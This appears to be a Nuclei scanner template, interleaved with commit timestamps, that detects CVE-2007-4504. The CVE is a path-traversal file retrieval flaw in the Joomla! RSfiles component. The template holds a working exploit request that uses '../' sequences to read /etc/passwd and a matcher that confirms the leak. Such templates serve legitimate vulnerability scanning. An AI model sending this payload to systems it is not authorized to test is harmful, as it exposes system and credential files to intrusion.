2021-11-09 22:49:13 +00:00
id : CVE-2007-4504
info :
2022-06-18 08:05:25 +00:00
name : Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
2021-11-09 22:49:13 +00:00
author : daffainfo
severity : high
2022-06-18 08:05:25 +00:00
description : An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
2021-11-09 22:49:13 +00:00
reference :
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
2022-06-18 08:05:25 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
classification :
cve-id : CVE-2007-4504
2021-11-09 22:49:13 +00:00
tags : cve,cve2007,joomla,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type : status
status :
- 200